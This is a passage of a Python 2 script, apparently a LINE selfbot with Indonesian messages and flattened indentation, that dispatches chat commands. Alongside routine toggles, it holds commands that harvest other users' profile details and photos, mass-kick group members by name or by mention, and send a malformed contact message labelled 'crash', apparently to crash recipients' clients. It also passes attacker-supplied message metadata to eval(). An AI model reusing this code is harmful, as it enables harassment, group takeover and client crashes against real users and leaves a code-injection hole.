for s in groups.members:
if _name in s.displayName:
print "[Target] Stealed"
break
else:
targets.append(copy)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
wait["steal"] = False
break
except:
pass
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"In Blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Nothing")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Not in Blacklist")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"In Blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'selfhelp':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpmsg)
else:
cl.sendText(msg.to,helpmsg)
elif msg.text.lower() == 'help5':
if wait["lang"] == "JP":
cl.sendText(msg.to,helppro)
else:
cl.sendText(msg.to,helppro)
elif msg.text.lower() == 'help4':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpself)
else:
cl.sendText(msg.to,helpself)
elif msg.text.lower() == 'help3':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpgrup)
else:
cl.sendText(msg.to,helpgrup)
elif msg.text.lower() == 'help2':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpset)
else:
cl.sendText(msg.to,helpset)
elif msg.text.lower() == 'help1':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpmed)
else:
cl.sendText(msg.to,helpmed)
elif msg.text.lower() == 'speed':
cl.sendText(msg.to, "Mencurigai..")
start = time.time()
time.sleep(0.07)
elapsed_time = time.time() - start
cl.sendText(msg.to, "Tercyduck\n Speed : %sseconds" % (elapsed_time))
elif msg.text.lower() == 'sp':
cl.sendText(msg.to, "Mencurigai..")
start = time.time()
time.sleep(0.07)
elapsed_time = time.time() - start
cl.sendText(msg.to, "Tercyduck\n Speed : %sseconds" % (elapsed_time))
elif msg.text.lower() == 'crash':
msg.contentType = 13
msg.contentMetadata = {'mid': "ud7a8fbcc2af037c2c5bf181b89fda5f7',"}
cl.sendMessage(msg)
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
#========================== B O T ``C O M M A N D =============================#
#==============================================================================#
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"contact set to on")
else:
cl.sendText(msg.to,"contact already on")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"contact set to on")
else:
cl.sendText(msg.to,"contact already on")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"contact set to off")
else:
cl.sendText(msg.to,"contact already off")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"contact set to off")
else:
cl.sendText(msg.to,"contact already off")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection set to on")
else:
cl.sendText(msg.to,"Protection already on")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection set to on")
else:
cl.sendText(msg.to,"Protection already on")
elif msg.text.lower() == 'qr on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr set to on")
else:
cl.sendText(msg.to,"Protection Qr already on")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr set to on")
else:
cl.sendText(msg.to,"Protection Qr already on")
elif msg.text.lower() == 'invit on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite set to on")
else:
cl.sendText(msg.to,"Protection Invite already on")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite set to on")
else:
cl.sendText(msg.to,"Protection Invite already on")
elif msg.text.lower() == 'cancel on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection set to on")
else:
cl.sendText(msg.to,"Cancel Protection already on")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection set to on")
else:
cl.sendText(msg.to,"Cancel Protection already on")
elif msg.text.lower() == 'autojoin on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Autojoin set to on")
else:
cl.sendText(msg.to,"Autojoin already on")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Autojoin set to on")
else:
cl.sendText(msg.to,"Autojoin already on")
elif msg.text.lower() == 'autojoin off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Autojoin set to off")
else:
cl.sendText(msg.to,"Autojoin already off")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Autojoin set to off")
else:
cl.sendText(msg.to,"Autojoin already off")
elif msg.text.lower() == 'protect off':
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection set to off")
else:
cl.sendText(msg.to,"Protection already off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection set to off")
else:
cl.sendText(msg.to,"Protection already off")
elif msg.text.lower() == 'qr off':
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr set to off")
else:
cl.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr set to off")
else:
cl.sendText(msg.to,"Protection Qr already off")
elif msg.text.lower() == 'invit off':
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite set to off")
else:
cl.sendText(msg.to,"Protection Invite already off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite set to off")
else:
cl.sendText(msg.to,"Protection Invite already off")
elif msg.text.lower() == 'cancel off':
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Invite set to off")
else:
cl.sendText(msg.to,"Cancel Protection Invite already off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Invite set to off")
else:
cl.sendText(msg.to,"Cancel Protection Invite already off")
elif "Grup cancel:" in msg.text:
try:
strnum = msg.text.replace("Grup cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan")
else:
cl.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis")
else:
cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar")
else:
cl.sendText(msg.to,"Weird value")
elif msg.text.lower() == 'autoleave on':
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to on")
else:
cl.sendText(msg.to,"Auto Leave room already on")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to on")
else:
cl.sendText(msg.to,"Auto Leave room already on")
elif msg.text.lower() == 'autoleave off':
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to off")
else:
cl.sendText(msg.to,"Auto Leave room already off")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to off")
else:
cl.sendText(msg.to,"Auto Leave room already off")
elif msg.text.lower() == 'share on':
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to on")
else:
cl.sendText(msg.to,"Share already on")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to on")
else:
cl.sendText(msg.to,"Share already on")
elif msg.text.lower() == 'share off':
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to off")
else:
cl.sendText(msg.to,"Share already off")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to off")
else:
cl.sendText(msg.to,"Share already off")
elif msg.text.lower() == 'status selfbot':
md = ""
if wait["contact"] == True: md+=" Contact:on \n"
else: md+=" Contact:off\n"
if wait["autoJoin"] == True: md+=" Auto Join:on \n"
else: md +=" Auto Join:off\n"
if wait["autoCancel"]["on"] == True:md+=" Auto cancel:" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel:off \n"
if wait["leaveRoom"] == True: md+=" Auto leave:on \n"
else: md+=" Auto leave:off \n"
if wait["timeline"] == True: md+=" Share:on \n"
else:md+=" Share:off \n"
if wait["autoAdd"] == True: md+=" Auto add:on \n"
else:md+=" Auto add:off \n"
if wait["protect"] == True: md+=" Protect:on \n"
else:md+=" Protect:off \n"
if wait["linkprotect"] == True: md+="Link Protect:on \n"
else:md+="Link Protect:off \n"
if wait["inviteprotect"] == True: md+="Invitation Protect:on \n"
else:md+="Invitation Protect:off \n"
if wait["cancelprotect"] == True: md+="Cancel Protect:on \n"
else:md+="Cancel Protect:off \n"
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u1e1625895e29236e4e2e2cc5e0fb5a85"}
cl.sendMessage(msg)
elif msg.text.lower() == 'autoadd on':
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to on")
else:
cl.sendText(msg.to,"Auto add already on")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to on")
else:
cl.sendText(msg.to,"Auto add already on")
elif msg.text.lower() == 'autoadd off':
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to off")
else:
cl.sendText(msg.to,"Auto add already off")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to off")
else:
cl.sendText(msg.to,"Auto add already off")
elif "Pesan set:" in msg.text:
wait["message"] = msg.text.replace("Pesan set:","")
cl.sendText(msg.to,"We changed the message")
elif msg.text.lower() == 'pesan cek':
if wait["lang"] == "JP":
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di")
else:
cl.sendText(msg.to,"To open")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Comment Actived")
else:
cl.sendText(msg.to,"Comment Has Been Active")
elif msg.text in ["Come off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off")
else:
cl.sendText(msg.to,"To turn off")
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklist")
else:
cl.sendText(msg.to,"The following is a blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Jam already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam set on")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Jam already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"Jam set off")
elif "Jam say:" in msg.text:
n = msg.text.replace("Jam say:","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Nama Jam Berubah menjadi:" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Jam")
#==============================================================================#
#==============================================================================#
elif msg.text in ["Invite"]:
wait["invite"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Steal contact"]:
wait["contact"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama
print "[Command]Like executed"
cl.sendText(msg.to,"Like Status Owner")
try:
likeme()
except:
pass
elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman
print "[Command]Like executed"
cl.sendText(msg.to,"Like Status Teman")
try:
likefriend()
except:
pass
elif msg.text in ["Like:on","Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
elif msg.text in ["Like off","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
elif msg.text in ["My simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
cl.sendText(msg.to,"Success activated simisimi")
elif msg.text in ["My simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
cl.sendText(msg.to,"Success deactive simisimi")
elif msg.text in ["My read on","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"Auto Sider ON")
elif msg.text in ["My read off","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"Auto Sider OFF")
elif msg.text in ["My autorespon on","Autorespon:on","My respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto Respon ON")
elif msg.text in ["My autorespon off","Autorespon:off","My respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto Respon OFF")
elif msg.text in ["Tag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"[AUTO RESPOND] Auto Kick yang tag ON")
elif msg.text in ["Tag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"[AUTO RESPOND] Auto Kick yang tag OFF")
#==============================================================================#
elif "らたかn" in msg.text:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("らたかn","")
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
sendMessage(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[cl]
kicker=random.choice(klist)
random.choice(KAC).kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
sendMessage(msg.to,"Grup Dibersihkan")
elif ("Kick " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Ulti " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Kick: " in msg.text:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif 'invite ' in msg.text.lower():
key = msg.text[-33:]
cl.findAndAddContactsByMid(key)
cl.inviteIntoGroup(msg.to, [key])
contact = cl.getContact(key)
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"Invitan tidak ada")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"Invitan tidak ada")
elif msg.text.lower() == 'link on':
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text.lower() == 'link off':
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close")
else:
cl.sendText(msg.to,"URL close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Url","Gurl"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
elif "Gcreator" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"Creator Grup")
elif msg.text.lower() == 'invite:gcreator':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if wait["lang"] == "JP":
cl.inviteIntoGroup(msg.to,[gcmid])
else:
cl.inviteIntoGroup(msg.to,[gcmid])
elif ("Gname: " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gname: ","")
cl.updateGroup(X)
elif msg.text.lower() == 'infogrup':
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text.lower() == 'grup id':
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#==============================================================================#
elif "Checkmid: " in msg.text:
saya = msg.text.replace("Checkmid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
cl.sendMessage(msg)
contact = cl.getContact(saya)
cu = cl.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Checkid: " in msg.text:
saya = msg.text.replace("Checkid: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).id
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
elif "Grupmember: " in msg.text:
saya = msg.text.replace('Grupmember: ','')
gid = cl.getGroupIdsJoined()
num=1
msgs="═════════List Member═════════-"
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
me = gna.members(i)
msgs+="\n[%i] %s" % (num, me.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(me)
if h == saya:
cl.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
contact = cl.getContact(i)
cu = cl.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
elif "Friendpict: " in msg.text:
saya = msg.text.replace('Friendpict: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Friendlistmid"]:
gruplist = cl.getAllContactIds()
kontak = cl.getContacts(gruplist)
num=1
msgs="═════════List FriendMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════List FriendMid═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Blocklist"]:
blockedlist = cl.getBlockedContactIds()
kontak = cl.getContacts(blockedlist)
num=1
msgs="═════════List Blocked═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Gruplist"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Gruplistmid"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List GrupMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Grupimage: " in msg.text:
saya = msg.text.replace('Grupimage: ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Grupname" in msg.text:
saya = msg.text.replace('Grupname','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Grupid" in msg.text:
saya = msg.text.replace('Grupid','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif "Grupinfo: " in msg.text:
saya = msg.text.replace('Grupinfo: ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Glist"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif msg.text.lower() == 'gcancel':
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku menolak semua undangan")
else:
